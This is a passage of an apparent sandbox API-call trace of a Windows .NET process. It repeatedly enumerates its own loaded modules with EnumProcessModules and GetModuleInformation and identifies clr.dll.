EntryPoint=0x76fc36a0)) returned 1 [0110.364] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x772b0000, lpmodinfo=0x18eb58, cb=0xc | out: lpmodinfo=0x18eb58*(lpBaseOfDll=0x772b0000, SizeOfImage=0x9d000, EntryPoint=0x772e3fd7)) returned 1 [0110.365] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75da0000, lpmodinfo=0x18eb58, cb=0xc | out: lpmodinfo=0x18eb58*(lpBaseOfDll=0x75da0000, SizeOfImage=0x60000, EntryPoint=0x75db158f)) returned 1 [0110.366] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x759a0000, lpmodinfo=0x18eb58, cb=0xc | out: lpmodinfo=0x18eb58*(lpBaseOfDll=0x759a0000, SizeOfImage=0xcc000, EntryPoint=0x759a168b)) returned 1 [0110.366] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x754f0000, lpmodinfo=0x18eb58, cb=0xc | out: lpmodinfo=0x18eb58*(lpBaseOfDll=0x754f0000, SizeOfImage=0x4a000, EntryPoint=0x754f2e54)) returned 1 [0110.366] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75490000, lpmodinfo=0x18eb58, cb=0xc | out: lpmodinfo=0x18eb58*(lpBaseOfDll=0x75490000, SizeOfImage=0x5f000, EntryPoint=0x75492134)) returned 1 [0110.367] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75480000, lpmodinfo=0x18eb58, cb=0xc | out: lpmodinfo=0x18eb58*(lpBaseOfDll=0x75480000, SizeOfImage=0x5000, EntryPoint=0x754811d0)) returned 1 [0110.367] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76260000, lpmodinfo=0x18eb58, cb=0xc | out: lpmodinfo=0x18eb58*(lpBaseOfDll=0x76260000, SizeOfImage=0xc4a000, EntryPoint=0x762e1601)) returned 1 [0110.368] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75460000, lpmodinfo=0x18eb58, cb=0xc | out: lpmodinfo=0x18eb58*(lpBaseOfDll=0x75460000, SizeOfImage=0x1c000, EntryPoint=0x7546a431)) returned 1 [0110.368] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75e00000, lpmodinfo=0x18eb58, cb=0xc | out: lpmodinfo=0x18eb58*(lpBaseOfDll=0x75e00000, SizeOfImage=0x6000, EntryPoint=0x75e01782)) returned 1 [0110.369] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75450000, lpmodinfo=0x18eb58, cb=0xc | out: lpmodinfo=0x18eb58*(lpBaseOfDll=0x75450000, SizeOfImage=0x7000, EntryPoint=0x7545128d)) returned 1 [0110.369] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x752c0000, lpmodinfo=0x18eb58, cb=0xc | out: lpmodinfo=0x18eb58*(lpBaseOfDll=0x752c0000, SizeOfImage=0x190000, EntryPoint=0x7535d026)) returned 1 [0110.370] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75f10000, lpmodinfo=0x18eb58, cb=0xc | out: lpmodinfo=0x18eb58*(lpBaseOfDll=0x75f10000, SizeOfImage=0x15c000, EntryPoint=0x75f5ba3d)) returned 1 [0110.370] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x751e0000, lpmodinfo=0x18eb58, cb=0xc | out: lpmodinfo=0x18eb58*(lpBaseOfDll=0x751e0000, SizeOfImage=0xd4000, EntryPoint=0x752130d2)) returned 1 [0110.371] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x750e0000, lpmodinfo=0x18eb58, cb=0xc | out: lpmodinfo=0x18eb58*(lpBaseOfDll=0x750e0000, SizeOfImage=0xf5000, EntryPoint=0x75134160)) returned 1 [0110.371] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74de0000, lpmodinfo=0x18eb58, cb=0xc | out: lpmodinfo=0x18eb58*(lpBaseOfDll=0x74de0000, SizeOfImage=0x13b000, EntryPoint=0x74ebcc89)) returned 1 [0110.372] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x750d0000, lpmodinfo=0x18eb58, cb=0xc | out: lpmodinfo=0x18eb58*(lpBaseOfDll=0x750d0000, SizeOfImage=0xd000, EntryPoint=0x750d13e4)) returned 1 [0110.372] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74d80000, lpmodinfo=0x18eb58, cb=0xc | out: lpmodinfo=0x18eb58*(lpBaseOfDll=0x74d80000, SizeOfImage=0x5f000, EntryPoint=0x0)) returned 1 [0110.373] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74d00000, lpmodinfo=0x18eb58, cb=0xc | out: lpmodinfo=0x18eb58*(lpBaseOfDll=0x74d00000, SizeOfImage=0x78000, EntryPoint=0x74d0f7ba)) returned 1 [0110.374] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x756d0000, lpmodinfo=0x18eb58, cb=0xc | out: lpmodinfo=0x18eb58*(lpBaseOfDll=0x756d0000, SizeOfImage=0x9000, EntryPoint=0x756d1220)) returned 1 [0110.374] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74410000, lpmodinfo=0x18eb58, cb=0xc | out: lpmodinfo=0x18eb58*(lpBaseOfDll=0x74410000, SizeOfImage=0x6a8000, EntryPoint=0x74557040)) returned 1 [0110.375] GetModuleBaseNameW (in: hProcess=0xffffffff, hModule=0x74410000, lpBaseName=0x18e950, nSize=0x104 | out: lpBaseName="clr.dll") returned 0x7 [0110.376] StrStrIW (lpFirst="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ole32.dll", lpSrch="\\system.ni.dll") returned 0x0 [0110.376] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0110.378] GetCurrentProcess () returned 0xffffffff [0110.378] EnumProcessModules (in: hProcess=0xffffffff, lphModule=0x18dc88, cb=0x1000, lpcbNeeded=0x18ee9c | out: lphModule=0x18dc88, lpcbNeeded=0x18ee9c) returned 1 [0110.379] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x400000, lpmodinfo=0x18ee90, cb=0xc | out: lpmodinfo=0x18ee90*(lpBaseOfDll=0x400000, SizeOfImage=0x142000, EntryPoint=0x540c00)) returned 1 [0110.379] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77bb0000, lpmodinfo=0x18ee90, cb=0xc | out: lpmodinfo=0x18ee90*(lpBaseOfDll=0x77bb0000, SizeOfImage=0x180000, EntryPoint=0x0)) returned 1 [0110.379] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75b90000, lpmodinfo=0x18ee90, cb=0xc | out: lpmodinfo=0x18ee90*(lpBaseOfDll=0x75b90000, SizeOfImage=0x110000, EntryPoint=0x75ba32d3)) returned 1 [0110.380] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77260000, lpmodinfo=0x18ee90, cb=0xc | out: lpmodinfo=0x18ee90*(lpBaseOfDll=0x77260000, SizeOfImage=0x46000, EntryPoint=0x77267478)) returned 1 [0110.380] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75cf0000, lpmodinfo=0x18ee90, cb=0xc | out: lpmodinfo=0x18ee90*(lpBaseOfDll=0x75cf0000, SizeOfImage=0xa0000, EntryPoint=0x75d049e5)) returned 1 [0110.380] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x758e0000, lpmodinfo=0x18ee90, cb=0xc | out: lpmodinfo=0x18ee90*(lpBaseOfDll=0x758e0000, SizeOfImage=0xac000, EntryPoint=0x758ea472)) returned 1 [0110.380] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75ef0000, lpmodinfo=0x18ee90, cb=0xc | out: lpmodinfo=0x18ee90*(lpBaseOfDll=0x75ef0000, SizeOfImage=0x19000, EntryPoint=0x75ef4975)) returned 1 [0110.380] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76110000, lpmodinfo=0x18ee90, cb=0xc | out: lpmodinfo=0x18ee90*(lpBaseOfDll=0x76110000, SizeOfImage=0xf0000, EntryPoint=0x76120569)) returned 1 [0110.381] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75710000, lpmodinfo=0x18ee90, cb=0xc | out: lpmodinfo=0x18ee90*(lpBaseOfDll=0x75710000, SizeOfImage=0x60000, EntryPoint=0x7572a3b3)) returned 1 [0110.381] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75700000, lpmodinfo=0x18ee90, cb=0xc | out: lpmodinfo=0x18ee90*(lpBaseOfDll=0x75700000, SizeOfImage=0xc000, EntryPoint=0x757010e1)) returned 1 [0110.381] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75d90000, lpmodinfo=0x18ee90, cb=0xc | out: lpmodinfo=0x18ee90*(lpBaseOfDll=0x75d90000, SizeOfImage=0x5000, EntryPoint=0x75d91438)) returned 1 [0110.381] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76070000, lpmodinfo=0x18ee90, cb=0xc | out: lpmodinfo=0x18ee90*(lpBaseOfDll=0x76070000, SizeOfImage=0x57000, EntryPoint=0x76089ba6)) returned 1 [0110.382] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76f30000, lpmodinfo=0x18ee90, cb=0xc | out: lpmodinfo=0x18ee90*(lpBaseOfDll=0x76f30000, SizeOfImage=0x90000, EntryPoint=0x76f46343)) returned 1 [0110.382] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x770d0000, lpmodinfo=0x18ee90, cb=0xc | out: lpmodinfo=0x18ee90*(lpBaseOfDll=0x770d0000, SizeOfImage=0x100000, EntryPoint=0x770eb6ed)) returned 1 [0110.382] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76fc0000, lpmodinfo=0x18ee90, cb=0xc | out: lpmodinfo=0x18ee90*(lpBaseOfDll=0x76fc0000, SizeOfImage=0xa000, EntryPoint=0x76fc36a0)) returned 1 [0110.382] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x772b0000, lpmodinfo=0x18ee90, cb=0xc | out: lpmodinfo=0x18ee90*(lpBaseOfDll=0x772b0000, SizeOfImage=0x9d000, EntryPoint=0x772e3fd7)) returned 1 [0110.383] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75da0000, lpmodinfo=0x18ee90, cb=0xc | out: lpmodinfo=0x18ee90*(lpBaseOfDll=0x75da0000, SizeOfImage=0x60000, EntryPoint=0x75db158f)) returned 1 [0110.383] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x759a0000, lpmodinfo=0x18ee90, cb=0xc | out: lpmodinfo=0x18ee90*(lpBaseOfDll=0x759a0000, SizeOfImage=0xcc000, EntryPoint=0x759a168b)) returned 1 [0110.384] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x754f0000, lpmodinfo=0x18ee90, cb=0xc | out: lpmodinfo=0x18ee90*(lpBaseOfDll=0x754f0000, SizeOfImage=0x4a000, EntryPoint=0x754f2e54)) returned 1 [0110.384] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75490000, lpmodinfo=0x18ee90, cb=0xc | out: lpmodinfo=0x18ee90*(lpBaseOfDll=0x75490000, SizeOfImage=0x5f000, EntryPoint=0x75492134)) returned 1 [0110.384] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75480000, lpmodinfo=0x18ee90, cb=0xc | out: lpmodinfo=0x18ee90*(lpBaseOfDll=0x75480000, SizeOfImage=0x5000, EntryPoint=0x754811d0)) returned 1 [0110.385] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76260000, lpmodinfo=0x18ee90, cb=0xc | out: lpmodinfo=0x18ee90*(lpBaseOfDll=0x76260000, SizeOfImage=0xc4a000, EntryPoint=0x762e1601)) returned 1 [0110.385] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75460000, lpmodinfo=0x18ee90, cb=0xc | out: lpmodinfo=0x18ee90*(lpBaseOfDll=0x75460000, SizeOfImage=0x1c000, EntryPoint=0x7546a431)) returned 1 [0110.386] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75e00000, lpmodinfo=0x18ee90, cb=0xc | out: lpmodinfo=0x18ee90*(lpBaseOfDll=0x75e00000, SizeOfImage=0x6000, EntryPoint=0x75e01782)) returned 1 [0110.386] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75450000, lpmodinfo=0x18ee90, cb=0xc | out: lpmodinfo=0x18ee90*(lpBaseOfDll=0x75450000, SizeOfImage=0x7000, EntryPoint=0x7545128d)) returned 1 [0110.387] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x752c0000, lpmodinfo=0x18ee90, cb=0xc | out: lpmodinfo=0x18ee90*(lpBaseOfDll=0x752c0000, SizeOfImage=0x190000, EntryPoint=0x7535d026)) returned 1 [0110.387] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75f10000, lpmodinfo=0x18ee90, cb=0xc | out: lpmodinfo=0x18ee90*(lpBaseOfDll=0x75f10000, SizeOfImage=0x15c000, EntryPoint=0x75f5ba3d)) returned 1 [0110.388] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x751e0000, lpmodinfo=0x18ee90, cb=0xc | out: lpmodinfo=0x18ee90*(lpBaseOfDll=0x751e0000, SizeOfImage=0xd4000, EntryPoint=0x752130d2)) returned 1 [0110.388] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x750e0000, lpmodinfo=0x18ee90, cb=0xc | out: lpmodinfo=0x18ee90*(lpBaseOfDll=0x750e0000, SizeOfImage=0xf5000, EntryPoint=0x75134160)) returned 1 [0110.389] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74de0000, lpmodinfo=0x18ee90, cb=0xc | out: lpmodinfo=0x18ee90*(lpBaseOfDll=0x74de0000, SizeOfImage=0x13b000, EntryPoint=0x74ebcc89)) returned 1 [0110.389] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x750d0000, lpmodinfo=0x18ee90, cb=0xc | out: lpmodinfo=0x18ee90*(lpBaseOfDll=0x750d0000, SizeOfImage=0xd000, EntryPoint=0x750d13e4)) returned 1 [0110.390] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74d80000, lpmodinfo=0x18ee90, cb=0xc | out: lpmodinfo=0x18ee90*(lpBaseOfDll=0x74d80000, SizeOfImage=0x5f000, EntryPoint=0x0)) returned 1 [0110.391] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74d00000, lpmodinfo=0x18ee90, cb=0xc | out: lpmodinfo=0x18ee90*(lpBaseOfDll=0x74d00000, SizeOfImage=0x78000, EntryPoint=0x74d0f7ba)) returned 1 [0110.391] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x756d0000, lpmodinfo=0x18ee90, cb=0xc | out: lpmodinfo=0x18ee90*(lpBaseOfDll=0x756d0000, SizeOfImage=0x9000, EntryPoint=0x756d1220)) returned 1 [0110.392] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74410000, lpmodinfo=0x18ee90, cb=0xc | out: lpmodinfo=0x18ee90*(lpBaseOfDll=0x74410000, SizeOfImage=0x6a8000, EntryPoint=0x74557040)) returned 1 [0110.392] GetModuleBaseNameW (in: hProcess=0xffffffff, hModule=0x74410000, lpBaseName=0x18ec88, nSize=0x104 | out: lpBaseName="clr.dll") returned 0x7 [0110.464] GetCurrentProcess () returned 0xffffffff [0110.464] EnumProcessModules (in: hProcess=0xffffffff, lphModule=0x18d940, cb=0x1000, lpcbNeeded=0x18eb54 | out: lphModule=0x18d940, lpcbNeeded=0x18eb54) returned 1 [0110.465] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x400000, lpmodinfo=0x18eb48, cb=0xc | out: lpmodinfo=0x18eb48*(lpBaseOfDll=0x400000, SizeOfImage=0x142000, EntryPoint=0x540c00)) returned 1 [0110.465] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77bb0000, lpmodinfo=0x18eb48, cb=0xc | out: lpmodinfo=0x18eb48*(lpBaseOfDll=0x77bb0000, SizeOfImage=0x180000, EntryPoint=0x0)) returned 1 [0110.465] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75b90000, lpmodinfo=0x18eb48, cb=0xc | out: lpmodinfo=0x18eb48*(lpBaseOfDll=0x75b90000, SizeOfImage=0x110000, EntryPoint=0x75ba32d3)) returned 1 [0110.465] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77260000, lpmodinfo=0x18eb48, cb=0xc | out: lpmodinfo=0x18eb48*(lpBaseOfDll=0x77260000, SizeOfImage=0x46000, EntryPoint=0x77267478)) returned 1 [0110.466] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75cf0000, lpmodinfo=0x18eb48, cb=0xc | out: lpmodinfo=0x18eb48*(lpBaseOfDll=0x75cf0000, SizeOfImage=0xa0000, EntryPoint=0x75d049e5)) returned 1 [0110.466] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x758e0000, lpmodinfo=0x18eb48, cb=0xc | out: lpmodinfo=0x18eb48*(lpBaseOfDll=0x758e0000, SizeOfImage=0xac000, EntryPoint=0x758ea472)) returned 1 [0110.466] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75ef0000, lpmodinfo=0x18eb48, cb=0xc | out: lpmodinfo=0x18eb48*(lpBaseOfDll=0x75ef0000, SizeOfImage=0x19000, EntryPoint=0x75ef4975)) returned 1 [0110.466] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76110000, lpmodinfo=0x18eb48, cb=0xc | out: lpmodinfo=0x18eb48*(lpBaseOfDll=0x76110000, SizeOfImage=0xf0000, EntryPoint=0x76120569)) returned 1 [0110.466] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75710000, lpmodinfo=0x18eb48, cb=0xc | out: lpmodinfo=0x18eb48*(lpBaseOfDll=0x75710000, SizeOfImage=0x60000, EntryPoint=0x7572a3b3)) returned 1 [0110.467] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75700000, lpmodinfo=0x18eb48, cb=0xc | out: lpmodinfo=0x18eb48*(lpBaseOfDll=0x75700000, SizeOfImage=0xc000, EntryPoint=0x757010e1)) returned 1 [0110.467] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75d90000, lpmodinfo=0x18eb48, cb=0xc | out: lpmodinfo=0x18eb48*(lpBaseOfDll=0x75d90000, SizeOfImage=0x5000, EntryPoint=0x75d91438)) returned 1 [0110.467] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76070000, lpmodinfo=0x18eb48, cb=0xc | out: lpmodinfo=0x18eb48*(lpBaseOfDll=0x76070000, SizeOfImage=0x57000, EntryPoint=0x76089ba6)) returned 1 [0110.467] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76f30000, lpmodinfo=0x18eb48, cb=0xc | out: lpmodinfo=0x18eb48*(lpBaseOfDll=0x76f30000, SizeOfImage=0x90000, EntryPoint=0x76f46343)) returned 1 [0110.468] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x770d0000, lpmodinfo=0x18eb48, cb=0xc | out: lpmodinfo=0x18eb48*(lpBaseOfDll=0x770d0000, SizeOfImage=0x100000, EntryPoint=0x770eb6ed)) returned 1 [0110.468] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76fc0000, lpmodinfo=0x18eb48, cb=0xc | out: lpmodinfo=0x18eb48*(lpBaseOfDll=0x76fc0000, SizeOfImage=0xa000, EntryPoint=0x76fc36a0)) returned 1 [0110.468] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x772b0000, lpmodinfo=0x18eb48, cb=0xc | out: lpmodinfo=0x18eb48*(lpBaseOfDll=0x772b0000, SizeOfImage=0x9d000, EntryPoint=0x772e3fd7)) returned 1 [0110.469] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75da0000, lpmodinfo=0x18eb48, cb=0xc | out: lpmodinfo=0x18eb48*(lpBaseOfDll=0x75da0000, SizeOfImage=0x60000, EntryPoint=0x75db158f)) returned 1 [0110.469] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x759a0000, lpmodinfo=0x18eb48, cb=0xc | out: lpmodinfo=0x18eb48*(lpBaseOfDll=0x759a0000, SizeOfImage=0xcc000, EntryPoint=0x759a168b)) returned 1 [0110.469] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x754f0000, lpmodinfo=0x18eb48, cb=0xc | out: lpmodinfo=0x18eb48*(lpBaseOfDll=0x754f0000, SizeOfImage=0x4a000, EntryPoint=0x754f2e54)) returned 1 [0110.470] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75490000, lpmodinfo=0x18eb48, cb=0xc | out: lpmodinfo=0x18eb48*(lpBaseOfDll=0x75490000, SizeOfImage=0x5f000, EntryPoint=0x75492134)) returned 1 [0110.470] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75480000, lpmodinfo=0x18eb48, cb=0xc | out: lpmodinfo=0x18eb48*(lpBaseOfDll=0x75480000, SizeOfImage=0x5000, EntryPoint=0x754811d0)) returned 1 [0110.471] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76260000, lpmodinfo=0x18eb48, cb=0xc | out: lpmodinfo=0x18eb48*(lpBaseOfDll=0x76260000, SizeOfImage=0xc4a000, EntryPoint=0x762e1601)) returned 1 [0110.471] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75460000, lpmodinfo=0x18eb48, cb=0xc | out: lpmodinfo=0x18eb48*(lpBaseOfDll=0x75460000, SizeOfImage=0x1c000, EntryPoint=0x7546a431)) returned 1 [0110.472] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75e00000, lpmodinfo=0x18eb48, cb=0xc | out: lpmodinfo=0x18eb48*(lpBaseOfDll=0x75e00000, SizeOfImage=0x6000, EntryPoint=0x75e01782)) returned 1 [0110.472] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75450000, lpmodinfo=0x18eb48, cb=0xc | out: lpmodinfo=0x18eb48*(lpBaseOfDll=0x75450000, SizeOfImage=0x7000, EntryPoint=0x7545128d)) returned 1 [0110.472] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x752c0000, lpmodinfo=0x18eb48, cb=0xc | out: lpmodinfo=0x18eb48*(lpBaseOfDll=0x752c0000, SizeOfImage=0x190000, EntryPoint=0x7535d026)) returned 1 [0110.473] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75f10000, lpmodinfo=0x18eb48, cb=0xc | out: lpmodinfo=0x18eb48*(lpBaseOfDll=0x75f10000, SizeOfImage=0x15c000, EntryPoint=0x75f5ba3d)) returned 1 [0110.474] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x751e0000, lpmodinfo=0x18eb48, cb=0xc | out: lpmodinfo=0x18eb48*(lpBaseOfDll=0x751e0000, SizeOfImage=0xd4000, EntryPoint=0x752130d2)) returned 1 [0110.474] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x750e0000, lpmodinfo=0x18eb48, cb=0xc | out: lpmodinfo=0x18eb48*(lpBaseOfDll=0x750e0000, SizeOfImage=0xf5000, EntryPoint=0x75134160)) returned 1 [0110.475] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74de0000, lpmodinfo=0x18eb48, cb=0xc | out: lpmodinfo=0x18eb48*(lpBaseOfDll=0x74de0000, SizeOfImage=0x13b000, EntryPoint=0x74ebcc89)) returned 1 [0110.475] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x750d0000, lpmodinfo=0x18eb48, cb=0xc | out: lpmodinfo=0x18eb48*(lpBaseOfDll=0x750d0000, SizeOfImage=0xd000, EntryPoint=0x750d13e4)) returned 1 [0110.476] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74d80000, lpmodinfo=0x18eb48, cb=0xc | out: lpmodinfo=0x18eb48*(lpBaseOfDll=0x74d80000, SizeOfImage=0x5f000, EntryPoint=0x0)) returned 1 [0110.476] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74d00000, lpmodinfo=0x18eb48, cb=0xc | out: lpmodinfo=0x18eb48*(lpBaseOfDll=0x74d00000, SizeOfImage=0x78000, EntryPoint=0x74d0f7ba)) returned 1 [0110.477] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x756d0000, lpmodinfo=0x18eb48, cb=0xc | out: lpmodinfo=0x18eb48*(lpBaseOfDll=0x756d0000, SizeOfImage=0x9000, EntryPoint=0x756d1220)) returned 1 [0110.478] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74410000, lpmodinfo=0x18eb48, cb=0xc | out: lpmodinfo=0x18eb48*(lpBaseOfDll=0x74410000, SizeOfImage=0x6a8000, EntryPoint=0x74557040)) returned 1 [0110.478] GetModuleBaseNameW (in: hProcess=0xffffffff, hModule=0x74410000, lpBaseName=0x18e940, nSize=0x104 | out: lpBaseName="clr.dll") returned 0x7 [0110.501] GetCurrentProcess () returned 0xffffffff [0110.501] EnumProcessModules (in: hProcess=0xffffffff, lphModule=0x18ca14, cb=0x1000, lpcbNeeded=0x18dc28 | out: lphModule=0x18ca14, lpcbNeeded=0x18dc28) returned 1 [0110.502] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x400000, lpmodinfo=0x18dc1c, cb=0xc | out: lpmodinfo=0x18dc1c*(lpBaseOfDll=0x400000, SizeOfImage=0x142000, EntryPoint=0x540c00)) returned 1 [0110.502] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77bb0000, lpmodinfo=0x18dc1c, cb=0xc | out: lpmodinfo=0x18dc1c*(lpBaseOfDll=0x77bb0000, SizeOfImage=0x180000, EntryPoint=0x0)) returned 1 [0110.502] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75b90000, lpmodinfo=0x18dc1c, cb=0xc | out: lpmodinfo=0x18dc1c*(lpBaseOfDll=0x75b90000, SizeOfImage=0x110000, EntryPoint=0x75ba32d3)) returned 1 [0110.502] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77260000, lpmodinfo=0x18dc1c, cb=0xc | out: lpmodinfo=0x18dc1c*(lpBaseOfDll=0x77260000, SizeOfImage=0x46000, EntryPoint=0x77267478)) returned 1 [0110.502] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75cf0000, lpmodinfo=0x18dc1c, cb=0xc | out: lpmodinfo=0x18dc1c*(lpBaseOfDll=0x75cf0000, SizeOfImage=0xa0000, EntryPoint=0x75d049e5)) returned 1 [0110.502] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x758e0000, lpmodinfo=0x18dc1c, cb=0xc | out: lpmodinfo=0x18dc1c*(lpBaseOfDll=0x758e0000, SizeOfImage=0xac000, EntryPoint=0x758ea472)) returned 1 [0110.503] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75ef0000, lpmodinfo=0x18dc1c, cb=0xc | out: lpmodinfo=0x18dc1c*(lpBaseOfDll=0x75ef0000, SizeOfImage=0x19000, EntryPoint=0x75ef4975)) returned 1 [0110.503] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76110000, lpmodinfo=0x18dc1c, cb=0xc | out: lpmodinfo=0x18dc1c*(lpBaseOfDll=0x76110000, SizeOfImage=0xf0000, EntryPoint=0x76120569)) returned 1 [0110.503] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75710000, lpmodinfo=0x18dc1c, cb=0xc | out: lpmodinfo=0x18dc1c*(lpBaseOfDll=0x75710000, SizeOfImage=0x60000, EntryPoint=0x7572a3b3)) returned 1 [0110.503] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75700000, lpmodinfo=0x18dc1c, cb=0xc | out: lpmodinfo=0x18dc1c*(lpBaseOfDll=0x75700000, SizeOfImage=0xc000, EntryPoint=0x757010e1)) returned 1 [0110.504] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75d90000, lpmodinfo=0x18dc1c, cb=0xc | out: lpmodinfo=0x18dc1c*(lpBaseOfDll=0x75d90000, SizeOfImage=0x5000, EntryPoint=0x75d91438)) returned 1 [0110.504] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76070000, lpmodinfo=0x18dc1c, cb=0xc | out: lpmodinfo=0x18dc1c*(lpBaseOfDll=0x76070000, SizeOfImage=0x57000, EntryPoint=0x76089ba6)) returned 1 [0110.504] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76f30000, lpmodinfo=0x18dc1c, cb=0xc | out: lpmodinfo=0x18dc1c*(lpBaseOfDll=0x76f30000, SizeOfImage=0x90000, EntryPoint=0x76f46343)) returned 1 [0110.504] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x770d0000, lpmodinfo=0x18dc1c, cb=0xc | out: lpmodinfo=0x18dc1c*(lpBaseOfDll=0x770d0000, SizeOfImage=0x100000, EntryPoint=0x770eb6ed)) returned 1 [0110.507] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76fc0000, lpmodinfo=0x18dc1c, cb=0xc | out: lpmodinfo=0x18dc1c*(lpBaseOfDll=0x76fc0000, SizeOfImage=0xa000, EntryPoint=0x76fc36a0)) returned 1 [0110.508] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x772b0000, lpmodinfo=0x18dc1c, cb=0xc | out: lpmodinfo=0x18dc1c*(lpBaseOfDll=0x772b0000, SizeOfImage=0x9d000, EntryPoint=0x772e3fd7)) returned 1 [0110.508] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75da0000, lpmodinfo=0x18dc1c, cb=0xc | out: lpmodinfo=0x18dc1c*(lpBaseOfDll=0x75da0000, SizeOfImage=0x60000, EntryPoint=0x75db158f)) returned 1 [0110.508] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x759a0000, lpmodinfo=0x18dc1c, cb=0xc | out: lpmodinfo=0x18dc1c*(lpBaseOfDll=0x759a0000, SizeOfImage=0xcc000, EntryPoint=0x759a168b)) returned 1 [0110.509] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x754f0000, lpmodinfo=0x18dc1c, cb=0xc | out: lpmodinfo=0x18dc1c*(lpBaseOfDll=0x754f0000, 